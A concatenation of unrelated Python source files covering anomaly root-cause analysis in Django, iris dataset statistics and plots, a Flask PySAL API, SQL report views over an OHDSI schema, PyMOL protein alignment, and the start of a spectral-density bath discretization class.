            rootCauseAnalysis.status = RootCauseAnalysis.STATUS_ABORTED
            rootCauseAnalysis.endTimestamp = dt.datetime.now()
            rootCauseAnalysis.save()
            # NOTE(review): message says "triggered RCA calculation" but this
            # is the abort path — looks like a copy-paste slip (left unchanged
            # here because the string is runtime behavior).
            res.update(True, "Successfully triggered RCA calculation")
        except Exception as ex:
            logger.error("Error in aborting RCA:%s", str(ex))
        return res

    @staticmethod
    def createRCAAnomaly(
        anomalyId: int, dimension: str, dimensionValue: str, contriPercent: float, df
    ):
        """
        Create RCA Anomaly for given anomalyId, dimension, dimensionValue
        :param anomalyId: id of anomaly object being analyzed
        :param dimension: dimension for which anomaly is being analyzed
        :param dimensionValue: dimension value for which anomaly is being analyzed
        :param contriPercent: percent contribution of given dimension: dimensionValue is whole
        :param df: data for anomaly detection
        """
        anomaly = Anomaly.objects.get(id=anomalyId)
        output = {"dimVal": dimensionValue, "success": True}
        try:
            if dataFrameEmpty(df):
                return output
            granularity = anomaly.anomalyDefinition.dataset.granularity
            result = detect(
                df, granularity, "Prophet", anomaly.anomalyDefinition, limit=6
            )
            del result["anomalyData"]["predicted"]
            # removing anomalous point other than last one
            anomalyTimeISO = anomaly.data["anomalyLatest"]["anomalyTimeISO"]
            # Only keep dimension anomalies that coincide with the parent
            # anomaly's latest timestamp.
            if (
                not "anomalyLatest" in result
                or not result["anomalyLatest"]
                or result["anomalyLatest"]["anomalyTimeISO"] != anomalyTimeISO
            ):
                return output
            for row in result["anomalyData"]["actual"]:
                # NOTE(review): 15/6/1 appear to be marker codes consumed
                # downstream — confirm their meaning before changing.
                if not (row["ds"] == anomalyTimeISO and row["anomaly"] == 15):
                    row["anomaly"] = 1
                else:
                    row["anomaly"] = 6
            # removing prediction band (trims the last 15 band points)
            result["anomalyData"]["band"] = result["anomalyData"]["band"][:-15]
            result["contribution"] = contriPercent
            result["anomalyLatest"]["contribution"] = contriPercent
            rcaAnomaly, _ = RCAAnomaly.objects.get_or_create(
                anomaly_id=anomalyId, dimension=dimension, dimensionValue=dimensionValue
            )
            rcaAnomaly.data = result
            rcaAnomaly.save()
            output["rcaAnomalyId"] = rcaAnomaly.id
        except Exception as ex:
            # Report failure details to the caller instead of raising.
            output["error"] = json.dumps(
                {"message": str(ex), "stackTrace": traceback.format_exc()}
            )
            output["success"] = False
        return output
|
# <NAME> - 22 March 2018
# Student ID: G00364778
# GMIT 52167 Final Project
"""
The purpose of this python code is to perform three major functions on the iris dataset
* Read in the csv data from a text file and return it in a format for further processing
* Run some basic statistical calculations on the dataset
* Graph the results for graphical comparison
The raw iris dataset consists of the following
1. sepal length in cm
2. sepal width in cm
3. petal length in cm
4. petal width in cm
5. class:
- Iris Setosa
- Iris Versicolour
- Iris Virginica
The csv read returns rows in this sample format: # 6.7,3.0,5.2,2.3,Iris-virginica
"""
import numpy as np
from matplotlib import pyplot as pl
import csv
# from sklearn.preprocessing import normalize as norm # not used, but kept for reference
import os
from scipy import stats
# Short column keys used in plot filenames.
setnames=['sepl','sepw','petl','petw']
# Human-readable measurement labels (same order as setnames).
setlabels=['Sepal Length','Sepal Width','Petal Length','Petal Width']
# The three iris species, in the order their blocks appear in the dataset.
species=['Setosa','Versicolour','Virginica']
# Row labels for the statistics table produced by calc_stats.
statlabels=['nobs', 'min', 'max', 'mean', 'var', 'skew', 'kurt']
def read_csv_datafile(datafile=r'data\iris.data'):
    """
    Read the csv data file passed in to the function, parse the data values from the file,
    create a numpy array of floats and transpose them to a format useable in further
    statistical processing and graphing in array format.

    :datafile: path to the iris csv file (4 float columns + species name per row)
    return value - numpy array of 4 x N floating point values
    """
    with open(datafile) as file:
        data = list(csv.reader(file))
    # Drop blank rows (csv.reader yields [] for empty lines). The previous
    # version blindly popped the last row, which silently dropped a real data
    # row whenever the file had no trailing blank line.
    data = [row for row in data if row]
    data = np.asarray(data)  # create a numpy array to work with
    # Keep the four numeric columns, convert to float, and transpose so each
    # measurement becomes one row.
    return data[0::, 0:4].astype(float).transpose()
def creat_xy_plots(dataset, species_in_set=3):
    """
    Create pairwise scatter plots from the dataset passed in, one PNG per
    measurement pair, colored by species.

    Inputs: dataset - the numpy array with sample data retrieved in 'read_csv_datafile'
            species_in_set - number of species in the set, default 3
    Outputs: plot images written to the 'plots' subfolder
    """
    cols,samples=np.shape(dataset) # retrieve the columns and samples from the set passed in
    # Boundaries between species blocks, assuming equal-sized contiguous blocks.
    b=[i for i in range(0,(samples+(samples//species_in_set)),(samples//species_in_set))] # calculate boundaries
    #print(b) # [0, 50, 100, 150] # test the calculations
    for x in range(cols): # loop through the four datasets
        for y in range(x,cols):
            if x!=y:
                #print(x,y)
                # One scatter series per species block: red, green, blue.
                Set,Ver,Vir=pl.plot(dataset[x,b[0]:b[1]],dataset[y,b[0]:b[1]],'ro',dataset[x,b[1]:b[2]],dataset[y,b[1]:b[2]],'go',dataset[x,b[2]:b[3]],dataset[y,b[2]:b[3]],'bo')
                pl.title('Iris plot by species - {} x {}'.format(setlabels[x],setlabels[y]))
                pl.legend((Set,Ver,Vir),species)
                pl.xlabel('{}(cm)'.format(setlabels[x]))
                pl.ylabel('{}(cm)'.format(setlabels[y]))
                # NOTE(review): backslash path is Windows-specific.
                filename='plots\\iris_plt_{}_{}.png'.format(setnames[x],setnames[y])
                os.makedirs(os.path.dirname(filename),mode=0o777,exist_ok=True)
                pl.savefig(filename)
                pl.close()
def calc_stats (data, screenprint=False):
    """
    Compute descriptive statistics for each measurement row of the dataset,
    optionally printing them as a formatted table.

    Inputs: data - the array returned by read_csv_datafile (rows = measurements)
            screenprint - when True, print the statistics table to stdout
    Output: numpy array of shape (7, cols) whose rows are
            nobs - number of objects in set
            min / max - extreme values in the set
            mean - the mean (average) of the set
            var - the sample variance of the set
            skew - the skewness (lack of symmetry about the center)
            kurt - the kurtosis (heavy-tailed or light-tailed)
    """
    cols, _samples = np.shape(data)
    # One row of statistics per measurement, flattened into plain tuples.
    table = []
    for idx in range(cols):
        nobsv, (minv, maxv), meanv, variancev, skewv, kurtosisv = stats.describe(data[idx])
        table.append((nobsv, minv, maxv, meanv, variancev, skewv, kurtosisv))
    st = np.asarray(table).transpose()
    if screenprint==True:
        border = '+-------+---------------+---------------+---------------+---------------+'
        # Header row: one column per measurement label.
        header = '|Stat' + ''.join('\t|{}'.format(label) for label in setlabels) + '\t|'
        print('\n' + border)
        print(header)
        print(border)
        # Data rows: one line per statistic.
        for name, row_vals in zip(statlabels, st):
            cells = ''.join('|{:7.3f}\t'.format(v) for v in row_vals)
            print('|{}\t'.format(name) + cells + '|')
        print(border)
    return st
def plot_hist(data,action='view'): # pass 'view' or 'save' for action
    """Show or save a histogram for each measurement row of the dataset.

    :data: array from read_csv_datafile (one row per measurement)
    :action: 'view' to display interactively, 'save' to write PNGs to 'plots/'
    """
    for i in range(len(data)):
        pl.hist(data[i])
        pl.ylabel(setlabels[i])
        if action == 'view':
            pl.show()
        elif action == 'save':
            # NOTE(review): backslash path is Windows-specific.
            filename='plots\\iris_hist_{}.png'.format(setnames[i])
            os.makedirs(os.path.dirname(filename),mode=0o777,exist_ok=True)
            pl.savefig(filename)
        pl.close()
#data=read_csv_datafile()
#creat_xy_plots(data)
#stat=calc_stats(data, screenprint=True)
#plot_hist(data,action='save')
|
from collections import Mapping
import copy
import os
import flask
from flask import Flask, jsonify, request, g, render_template, session,\
redirect, url_for, escape, current_app
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.login import LoginManager
#from flask.ext.cors import CORS
import krispy
print dir(krispy)
from krispy.mod_api.extractapi import recursive_extract, recursive_documentation
import mod_api.aggregate as agg
import config
from decorators import crossdomain
#Custom
import w_from_geojson
#TODO: Library name from config
# Import the analysis library (e.g. pysal) named in config.
library = __import__(config.library)
#Create the app
app = Flask(__name__)
app.debug = config.DEBUG
#Create the login manager
app.config['LOGIN_DISABLED'] = config.LOGIN_DISABLED
lm = LoginManager(app)
lm.login_view = "user.login"
#Add a class_references attribute to the application
with app.app_context():
    if getattr(current_app, 'class_references',None) is None:
        current_app.class_references = {}
        seen_classes = set() # Geom tables already mapped
#Configure the application from config.py
app.config.from_object('config')
#Define the database handle used by the application (SQLAlchemy)
db = SQLAlchemy(app)
#Setup a fixed length dict to store cached objs
#TODO: Write a fixed length dict. by subclassing OrderedDict
cachedobjs = {}
#Initialize a listing of the library functionality
"""
The idea here is that pysalfunctions could be swapped
to be a JSON file or the underlying logic can change.
The only requirement is that this is a dictionary with
a most nested level of 'function_name':func_object pairs.
"""
def treeZip(t1, t2, path=None):
    """
    Walk two nested dictionaries in parallel, yielding (path, (leaf1, leaf2))
    tuples at every leaf position.

    Keys present in t1 but missing from t2 are first added to t2 with the
    placeholder value 'True', so t2 ends up covering every key of t1.

    :t1: reference (nested) dict
    :t2: dict updated in place with keys it is missing relative to t1
    :path: list of keys leading to the current node (internal, recursive use)
    """
    # Avoid the mutable-default-argument pitfall of the original (path=[]).
    if path is None:
        path = []
    if isinstance(t1, dict) and isinstance(t2, dict):
        try:
            assert(t1.keys() == t2.keys())
        except AssertionError:
            current_keys = set(t1.keys())
            mapped_keys = set(t2.keys())
            for k in current_keys.difference(mapped_keys):
                t2[k] = 'True'
    if isinstance(t1, Mapping) and isinstance(t2, Mapping):
        #assert set(t1)==set(t2)
        for k, v1 in t1.items():
            v2 = t2[k]
            # (renamed the loop variable: the original shadowed builtin `tuple`)
            for leaf in treeZip(v1, v2, path=path + [k]):
                yield leaf
    else:
        yield (path, (t1, t2))
def setInDict(dataDict, mapList, value):
    """
    Remove `value` from the dict located at path mapList[:-1] inside dataDict.

    NOTE(review): despite the name, this does not set anything — it pops the
    given key from the parent node (used above to prune disabled library
    entries). Returns None.
    """
    getFromDict(dataDict, mapList[:-1]).pop(value, None)
def getFromDict(dataDict, mapList):
    """Return the value at the key-path `mapList` inside nested dict `dataDict`.

    An empty mapList returns dataDict itself.
    """
    # functools.reduce works on both Python 2 and 3; the bare builtin
    # `reduce` used before is Python-2 only.
    from functools import reduce
    return reduce(lambda d, k: d[k], mapList, dataDict)
def clean_empty(d):
    """
    Remove keys whose value is an empty dict, one nesting level per call.

    Non-empty dict values are cleaned recursively, but a value that *becomes*
    empty during this pass is only removed by a subsequent call (hence the
    repeated invocations at module level).
    """
    # Iterate over a snapshot: mutating a dict while iterating its live
    # items() view raises RuntimeError on Python 3 (py2's items() returned
    # a list, which is why the original got away with it).
    for k, v in list(d.items()):
        if isinstance(v, dict):
            if not v:
                d.pop(k, None)
            else:
                clean_empty(v)
# Build the nested mapping of exposed library functions, plus a custom entry.
visited = set([])
libraryfunctions = {}
recursive_extract(library, libraryfunctions, library.__name__, visited)
libraryfunctions['weights']['user']['queen_from_geojson'] = w_from_geojson.queen_geojson
#Recursive function extraction
librarydocs = copy.deepcopy(libraryfunctions)
recursive_documentation(librarydocs)
print librarydocs['weights']['user']['queen_from_geojson']
# Optionally prune the exposed functions using a JSON map of enable flags.
if config.loadmap:
    import json
    with open(config.loadmap, 'r') as configin:
        mapping = json.load(configin)
    livekeys = list(treeZip(libraryfunctions, mapping))
    #livekeys is updated with potential new entries and rewritten, keeping existing settings
    with open('librarymap.json', 'w') as mapfile:
        mapfile.write(json.dumps(mapping, indent=2))
    # Remove every entry whose map flag is False from functions and docs.
    for k, v in livekeys:
        if v[1] == False:
            dataDict = setInDict(libraryfunctions, k, k[-1])
            dataDict = setInDict(librarydocs, k, k[-1])
#How can I better recursively clean?
# clean_empty removes one level of emptiness per pass, so run it a few times.
for x in range(4):
    clean_empty(libraryfunctions)
    clean_empty(librarydocs)
#Add in the custom aggregator
libraryfunctions['custom'] = {}
libraryfunctions['custom']['aggregator'] = agg.aggregator
librarydocs['custom'] = {}
librarydocs['custom']['aggregator'] = agg.aggregator_docs
print libraryfunctions.keys()
@lm.user_loader
def load_user(id):
    """Flask-Login user loader: fetch a User by primary key."""
    #Lazy load to avoid cyclical imports
    from app.mod_user.models import User
    return User.query.get(int(id))
#Error handling routes
@app.errorhandler(404)
def not_found(error):
    """Return a plain-text message for unknown endpoints (HTTP 404)."""
    return "Error 404: Unable to find endpoint."
#Home
@app.route('/', methods=['GET'])
def api_root():
    """Root endpoint: JSON index of the service's top-level sections."""
    response = {'status':'success'}
    response['links'] = [{'name':'api', 'href': config.baseurl + '/api/', 'description':'Access to the PySAL API'},
                         {'name':'user', 'href': config.baseurl + '/user/', 'description':'Login, Registration, and User management'},
                         {'name':'data', 'href':config.baseurl + '/data/', 'description':'User data and upload functionality'}]
    return jsonify(response)
###Import components use a blue_print handler###
#API
from app.mod_api.controllers import mod_api as api_module
app.register_blueprint(api_module, url_prefix='/api')
#User Management
from app.mod_user.controllers import mod_user as user_module
users = app.register_blueprint(user_module, url_prefix='/user')
#Data
from app.mod_data.controllers import mod_data as data_module
data = app.register_blueprint(data_module, url_prefix='/data')
#CORS(data) #Allow CORS calls to the data blueprint
#Uploads
#from app.mod_upload.controllers import mod_upload as upload_module
#app.register_blueprint(upload_module, url_prefix='/upload')
#Create the tables if this is a new deployment
db.create_all()
|
<filename>django_harmonization/ui/report_views.py<gh_stars>0
#!/usr/bin/env python3
'''
Copyright 2017 The Regents of the University of Colorado
Licensed under the Apache License, Version 2.0 (the "License")
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
report_views.py <db> <user>
Python Version: 3.6.3
croeder 3/2018 <EMAIL>
cribbed from report.py
'''
import psycopg2
from psycopg2.extras import RealDictCursor
from HeartData.study import get_study_details
# NOTE(review): `serializers` is never imported in this module (it comes from
# Django REST framework), so this class definition raises NameError at import
# time — confirm the missing `from rest_framework import serializers`.
class StudyValueSerializer(serializers.Serializer):
    # Flat row serializer for study values; all fields are plain strings.
    id = serializers.CharField(max_length=100);
    value = serializers.CharField(max_length=100);
    from_table = serializers.CharField(max_length=100);
    from_column = serializers.CharField(max_length=100);
def get_concept_id_and_name(con, vocabulary, concept_code):
    ''' given a vocabulary name and concept code, return the
    (concept_id, concept_name) pair within the OHDSI CDM, or (None, None)
    when the code is not present '''
    cur = con.cursor(cursor_factory=RealDictCursor)
    stmt = ("SELECT concept_id, concept_name "
            "FROM concept "
            "WHERE concept_code = %s and vocabulary_id = %s")
    cur.execute(stmt, (concept_code, vocabulary))
    rows = cur.fetchall()
    cur.close()
    if rows:
        return (rows[0]['concept_id'], rows[0]['concept_name'])
    return (None, None)
    # Fix: the serialization loop that previously followed this return was
    # unreachable dead code (cribbed from report.py) and has been removed.
def extract_calculation_arguments(con, study_id, to_vocabulary, to_concept_code, function_name):
    ''' fetch the arguments that go with a calculation rule and write them to stdout '''
    # Fix: `sys` was referenced without being imported anywhere in this
    # module, so this function raised NameError as soon as it was called.
    import sys
    log = sys.stdout.write
    stmt = ("SELECT argument_name, value_field, vocabulary_id, concept_code, from_table "
            "FROM ohdsi_calculation_argument "
            "WHERE study_id = %s and to_concept_code = %s "
            "AND to_vocabulary_id = %s and function_name = %s")
    #print stmt, (study_id, to_vocabulary, to_concept_code, function_name)
    cur = con.cursor(cursor_factory=RealDictCursor)
    cur.execute(stmt, (study_id, to_concept_code, to_vocabulary, function_name))
    rows = cur.fetchall()
    for row in rows:
        log(" {}:{}, {}:{} \"{}\"\n".format(row['vocabulary_id'],
                                            row['concept_code'],
                                            row['from_table'],
                                            row['value_field'],
                                            row['argument_name']))
    cur.close()
## TODO ohdsi_calculated_table
def report_calculated_concepts(con, study_id):
    ''' Return the calculation-function configuration rows for a study,
    ordered by target concept and function order. '''
    query = ("SELECT ocf.function_name as fn, "
             "ocf.to_vocabulary_id as vocab, "
             "ocf.to_concept_code as concept, "
             "ocf.function_order as f_order "
             "FROM ohdsi_calculation_function ocf "
             "WHERE ocf.study_id = %s "
             "ORDER BY ocf.to_concept_code, ocf.function_order ")
    cursor = con.cursor(cursor_factory=RealDictCursor)
    cursor.execute(query, (study_id,))
    fetched = cursor.fetchall()
    return fetched
def extract_function_parameters(con, function_name, long_name, rule_id):
    ''' fetch the parameters to go with an extraction function '''
    query = ("SELECT value_limit, from_string, from_concept_id, rank "
             "FROM categorization_function_parameters "
             "WHERE function_name = %s "
             "AND long_name = %s "
             "AND rule_id = %s "
             "ORDER BY rank")
    cursor = con.cursor(cursor_factory=RealDictCursor)
    cursor.execute(query, (function_name, long_name, rule_id))
    parameter_rows = cursor.fetchall()
    cursor.close()
    return parameter_rows
#class MappedConceptsSerializer(serializers.Serializer):
# study_id
# from_table as m_from_table
#= serializers.CharField(max_length=100);
# from_column as m_from_column
#= serializers.CharField(max_length=100);
# function_name as m_function_name
#= serializers.CharField(max_length=100);
# vocabulary_id as vocab
#= serializers.CharField(max_length=100);
# concept_code as concept
#= serializers.CharField(max_length=100);
# to_table as m_to_table
#= serializers.CharField(max_length=100);
# to_column as m_to_column
#= serializers.CharField(max_length=100);
# from_table as c_from_table
#= serializers.CharField(max_length=100);
# function_name as c_function_name
#= serializers.CharField(max_length=100);
# long_name as c_long_name
#= serializers.CharField(max_length=100);
# rule_id
# id
#= serializers.CharField(max_length=100);
# value = serializers.CharField(max_length=100);
# from_table = serializers.CharField(max_length=100);
# from_column = serializers.CharField(max_length=100);
def report_mapped_concepts(con, study_id):
    ''' report and print the configuration
    joins on categorization_function_metadata so it only shows
    concepts used by direct extraction/categorization

    NOTE(review): JsonResponse is never imported in this module, and the
    StudyValueSerializer fields do not match these row keys — this function
    appears half-ported from a Django view; confirm before use.
    '''
    cur = con.cursor(cursor_factory=RealDictCursor)
    stmt = ("SELECT "
            "m.study_id, "
            "m.from_table as m_from_table, "
            "m.from_column as m_from_column, "
            "m.function_name as m_function_name, "
            "m.vocabulary_id as vocab, "
            "m.concept_code as concept, "
            "m.to_table as m_to_table, "
            "m.to_column as m_to_column, "
            "c.from_table as c_from_table, "
            "c.function_name as c_function_name, "
            "c.long_name as c_long_name,"
            "c.rule_id "
            "FROM study_to_ohdsi_mapping m, categorization_function_metadata c "
            "WHERE m.study_id = %s "
            "AND m.function_name is not null "
            "AND m.vocabulary_id = c.from_vocabulary_id "
            "AND m.concept_code = c.from_concept_code "
            "ORDER BY m.study_id, c.long_name;")
    cur.execute(stmt, (study_id,))
    rows = cur.fetchall()
    # SERIALIZE
    json_list=list()
    for row in rows:
        print("DEBUG: get_study_values() ROW", row)  # debug leftover
        serializer = StudyValueSerializer(row)
        serialized = serializer.data
        print("DEBUG: get_study_values() SER", serialized)  # debug leftover
        json_list.append(serialized)
    return(JsonResponse(json_list, safe=False, status=200)) # JsonResponse application/json
def report_unmapped_concepts(con, study_id):
    ''' Report the mapping configuration without the categorization join,
    listing concepts that might be used as input to further calculation. '''
    query = ("SELECT m.study_id, m.from_table as m_from_table, "
             "m.from_column as m_from_column, "
             "m.function_name as m_function_name, "
             "m.vocabulary_id as vocab, "
             "m.concept_code as concept, "
             "m.to_table as m_to_table, "
             "m.to_column as m_to_column, "
             "o.function_name as function_name "
             "FROM study_to_ohdsi_mapping m "
             " JOIN ohdsi_calculation_argument o "
             " ON m.vocabulary_id = o.vocabulary_id "
             " AND o.concept_code = m.concept_code "
             " AND o.study_id = m.study_id "
             "WHERE m.study_id = %s "
             " AND m.function_name is not null "
             "ORDER BY m.study_id;")
    cursor = con.cursor(cursor_factory=RealDictCursor)
    cursor.execute(query, (study_id,))
    return cursor.fetchall()
def report_calculated_extraction(con, study_id, extract_study_id):
    ''' Shows categorization for results of calculations.
    This is for concepts that don't come directly from input tables, rather
    ones that are calculated.
    '''
    cur = con.cursor(cursor_factory=RealDictCursor)
    stmt = ("SELECT "
            "c.from_vocabulary_id, "
            "c.from_concept_code, "
            "c.from_table, "
            "c.function_name, "
            "c.long_name, "
            "c.rule_id "
            "FROM categorization_function_metadata c "
            " LEFT JOIN study_to_ohdsi_mapping m "
            " ON m.vocabulary_id = c.from_vocabulary_id "
            " AND m.concept_code = c.from_concept_code "
            "WHERE m.study_id = %s "
            " AND c.extract_study_id = %s "
            "AND m.function_name is null "
            "ORDER BY m.study_id, c.long_name;")
    # Fix: parameters were previously passed as (extract_study_id, study_id),
    # binding extract_study_id to m.study_id and vice versa; bind them in the
    # order the placeholders appear.
    cur.execute(stmt, (study_id, extract_study_id,))
    rows = cur.fetchall()
    return(rows)
def report_events_mapping(con, study_id):
    '''Return all events_mapping rows for the given study.'''
    cursor = con.cursor(cursor_factory=RealDictCursor)
    query = ("SELECT from_table, from_column, value_vocabulary_id, value_concept_code, to_table, to_column, from_date_column, where_clause, comment "
            " FROM events_mapping "
            " WHERE study_id = %s")
    cursor.execute(query, (study_id,))
    return cursor.fetchall()
def report_wide_extraction(con, extract_study_id):
    '''Return the categorization_function_table rows for an extraction study.'''
    cursor = con.cursor(cursor_factory=RealDictCursor)
    query = ("SELECT from_table, from_column, from_vocabulary_id, from_concept_code, function_name, long_name "
            " FROM categorization_function_table "
            " WHERE extract_study_id = %s")
    cursor.execute(query, (extract_study_id,))
    return cursor.fetchall()
def get_study_name(con, study_id):
    ''' Returns the study_name rows for the given study_id.

    BUG FIX: the original fetched the rows but never returned them (always
    returning None), and printed debug noise. Now returns cur.fetchall().

    :param con: open database connection
    :param study_id: id matched against study.study_id
    :return: list of (study_name,) tuples (empty when no match)
    '''
    cur = con.cursor()
    stmt = "SELECT study_name FROM study WHERE study_id = %s"
    cur.execute(stmt, (study_id, ))
    return cur.fetchall()
def get_study_details(con, name):
    ''' returns (study_id, observation_range_start, observation_range_end, person_id_range_start, person_id_range_end ) given a study name

    raises LookupError if it can't find the study name

    BUG FIX: the original fetched the rows but never returned them and never
    raised, so callers always got None; now it honors the documented contract.
    '''
    cur = con.cursor()
    stmt = "SELECT study_id, observation_range_start, observation_range_end, person_id_range_start, person_id_range_end FROM study WHERE study_name = %s"
    cur.execute(stmt, (name,))
    rows = cur.fetchall()
    if not rows:
        raise LookupError("unknown study name: %s" % name)
    return rows[0]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
''' Align a list of molecules using `super` command in PyMol. The first item
in the list is considered as the reference.
'''
import pymolPy3
import pyrotein as pr
import os
from loaddata import load_gpcrdb_xlsx
## from pmview import view_dict
job_name = "xfam"
# [[[ OBTAIN THE CONSENSUS SEQUENCE ]]]
# Read the sequence alignment result...
fl_aln = f"{job_name}.step4.psa.fil.fasta"
seq_dict = pr.fasta.read(fl_aln)
# The default ones are not good enough
# NOTE(review): nseqi/cseqi look like alignment-column bounds used to slice
# every sequence below — confirm against the alignment file.
nseqi = 616
cseqi = 1248
# Define atoms used for distance matrix analysis...
backbone = ["N", "CA", "C", "O"]
len_res = len(backbone)
# NOTE(review): len_seq is computed here but not used later in this script.
len_seq = (cseqi - nseqi + 1) * len_res
# [[[ LOAD DATABASE ]]]
# Specify chains to process...
fl_chain = "gpcrdb.all.xlsx"
sheet = f"{job_name}"
lines = load_gpcrdb_xlsx(fl_chain, sheet = sheet, splitchain = True)
drc = "pdb"
# Define atoms used for structural alignment...
backbone = ["N", "CA", "C", "O"]
# Specify the backbone atoms to select...
backbone_select = "name " + "+".join( backbone )
# Specify the rigid framework...
# fwk.dat holds index-pair rows; // 4 converts atom-level indices to
# residue-level ones (4 backbone atoms per residue) — TODO confirm.
fl_fwk = 'fwk.dat'
fwk = pr.utils.read_file(fl_fwk)
fwk = [ [int(i) // 4, int(j) // 4] for i, j in fwk ]
# Pick a PDB...
pdb, chain = "6PS6", "A"
fl_pdb = f"{pdb}.pdb"
pdb_path = os.path.join(drc, fl_pdb)
atoms_pdb = pr.atom.read(pdb_path)
atom_dict = pr.atom.create_lookup_table(atoms_pdb)
chain_dict = atom_dict[chain]
# Obtain seq string for the current chain...
tar_seq = seq_dict[f"{pdb.lower()}_{chain}"]
# Obtain the mapping from seqi to resi...
seqi_to_resi_dict = pr.atom.seqi_to_resi(chain_dict, tar_seq, nseqi, cseqi)
tar_seq_fil = tar_seq[ nseqi : cseqi + 1 ]
# First/last residues resolved inside the aligned window.
resi_min = seqi_to_resi_dict[nseqi + pr.fasta.get_lseqi(tar_seq_fil)]
resi_max = seqi_to_resi_dict[nseqi + pr.fasta.get_rseqi(tar_seq_fil)]
# Find all resi required for alignment...
fwk_resi = []
for b, e in fwk:
    for i in range(b, e + 1):
        seqi = nseqi + i
        resi = seqi_to_resi_dict[seqi]
        # Skip alignment positions with no resolved residue in this chain.
        if resi is None: continue
        fwk_resi.append(resi)
fwk_select = {}
fwk_select[f"{pdb}_{chain}"] = '+'.join( [ str(i) for i in fwk_resi ] )
# Customize cartoon representation...
color = { "rigid" : "0xc1ffc1",
          "mobile" : "0xb8b8ff", }
# Start pymol
pm = pymolPy3.pymolPy3()
pm("window size, 1500, 1500")
pm("bg white")
pm("set cartoon_fancy_helices, 1")
pm("set cartoon_highlight_color, grey90")
pm("set cartoon_dumbbell_length, 1")
pm("set cartoon_dumbbell_width, 0.3")
pm("set cartoon_dumbbell_radius, 0.2")
pm("set sphere_scale, 0.3")
# Load the first structure (target)...
entry = f"{pdb}"
pdb_path = os.path.join(drc, f"{entry}.pdb")
pm(f"load {pdb_path}")
pm(f"remove {entry} and not chain {chain}")
pm(f"remove {entry} and not polymer.protein")
pm(f"hide cartoon, chain {chain}")
pm(f"show cartoon, chain {chain} and resi {resi_min}-{resi_max}")
# Select the rigid framework from the target...
target = f"{entry}_fwk"
pm(f"select {target}, (%{entry} and {backbone_select}) and (resi {fwk_select[f'{pdb}_{chain}']})")
pm(f"disable %{target}")
pm(f"set cartoon_color, {color['mobile']}, all")
pm(f"set cartoon_color, {color['rigid']}, {entry}_fwk")
# Create labels...
entry_dict = { f"{v[7]}_{v[10]}" : i for i, v in enumerate(lines) }
# Selectively plot entries...
pdb_list = [ "3SN6_R" ]
# NOTE(review): entry_fil_dict is built but never used below.
entry_fil_dict = { k : entry_dict[k] for k in pdb_list if k in entry_dict }
for v in pdb_list[:]:
    # Load a mobile structure...
    pdb, chain = v.split("_")
    entry = f"{pdb}"
    pdb_path = os.path.join(drc, f"{entry}.pdb")
    atoms_pdb = pr.atom.read(pdb_path)
    atom_dict = pr.atom.create_lookup_table(atoms_pdb)
    chain_dict = atom_dict[chain]
    # Obtain seq string for the current chain...
    tar_seq = seq_dict[f"{pdb.lower()}_{chain}"]
    # Obtain the mapping from seqi to resi...
    seqi_to_resi_dict = pr.atom.seqi_to_resi(chain_dict, tar_seq, nseqi, cseqi)
    tar_seq_fil = tar_seq[ nseqi : cseqi + 1 ]
    resi_min = seqi_to_resi_dict[nseqi + pr.fasta.get_lseqi(tar_seq_fil)]
    resi_max = seqi_to_resi_dict[nseqi + pr.fasta.get_rseqi(tar_seq_fil)]
    # Find all resi required for alignment...
    fwk_resi = []
    for b, e in fwk:
        for i in range(b, e + 1):
            seqi = nseqi + i
            resi = seqi_to_resi_dict[seqi]
            if resi is None: continue
            fwk_resi.append(resi)
    fwk_select[f"{pdb}_{chain}"] = '+'.join( [ str(i) for i in fwk_resi ] )
    # Work on it
    pm(f"load {pdb_path}")
    pm(f"remove {entry} and not chain {chain}")
    pm(f"remove {entry} and not polymer.protein")
    pm(f"hide cartoon, {entry} and chain {chain}")
    pm(f"show cartoon, {entry} and chain {chain} and resi {resi_min}-{resi_max}")
    # Select the rigid framework from the mobile...
    mobile = f"{entry}_fwk"
    pm(f"select {mobile}, (%{entry} and {backbone_select}) and (resi {fwk_select[f'{pdb}_{chain}']})")
    pm(f"disable %{mobile}")
    pm(f"set cartoon_color, {color['mobile']}, all")
    pm(f"set cartoon_color, {color['rigid']}, {entry}_fwk")
    # Align...
    # `super` superposes the mobile framework selection onto the target's.
    pm(f"super {mobile}, {target}")
pm(f"orient")
# Keep the PyMol session alive until the user presses Enter.
input()
|
<filename>mapping/star/discretized_bath/asymmetric_mean.py
"""
Discretized bath for the generation of direct asymmetric discretization coefficients, where the integrals for
the couplings and energies are evaluated using a heuristic method called mean discretization.
Introduced in: de Vega et al., Phys. Rev. B 92, 155126 (2015)
"""
import numpy as np
from scipy.integrate import quad
from mapping.star.discretized_bath.base.asymmetric import BaseDiscretizedAsymmetricBath
from mapping.utils.integration_defaults import default_epsabs, default_epsrel, default_limit
from mapping.star.discretized_bath.stopcoeff import StopCoefficients
class MeanDiscretizedAsymmetricBath(BaseDiscretizedAsymmetricBath):
    def __init__(self, J, domain, max_nof_coefficients=100, **kwargs):
        """
        Generates direct discretization coefficients from a spectral density J, by
        mean discretization (see de Vega et al., Phys. Rev. B 92, 155126 (2015) for details on the method)
        Computes max_nof_coefficients coefficients directly!
        :param J: Spectral density. A function defined on 'domain', must be >0 in the inner part of domain
        :param domain: List/tuple of two elements for the left and right boundary of the domain of J
        :param max_nof_coefficients: Size of the buffers which hold gamma and xi coefficients (maximum number of
                                     these coefficients that can be calculated)
        :param kwargs: may contain 'ignore_zeros' If one gamma_i is numerically 0, the corresponding xi_i is also set 0,
                                   default is False
                       'epsabs': absolute tolerance for the scipy integrations, default is 1e-11
                       'epsrel': relative tolerance for the scipy integrations, default is 1e-11
                       'limit': limit parameter for the scipy quad function, default is 100
        """
        # Mean discretization requires a finite upper band edge.
        assert not np.isinf(domain[1])
        # dict.get replaces the original four try/except KeyError blocks
        # (identical semantics, less noise).
        self.ignore_zeros = kwargs.get('ignore_zeros', False)
        self.epsabs = kwargs.get('epsabs', default_epsabs)
        self.epsrel = kwargs.get('epsrel', default_epsrel)
        self.limit = kwargs.get('limit', default_limit)
        self.J = J
        # First-moment integrand x*J(x), used for the weighted interval averages.
        self.Jx = lambda x: J(x) * x
        self.domain = domain
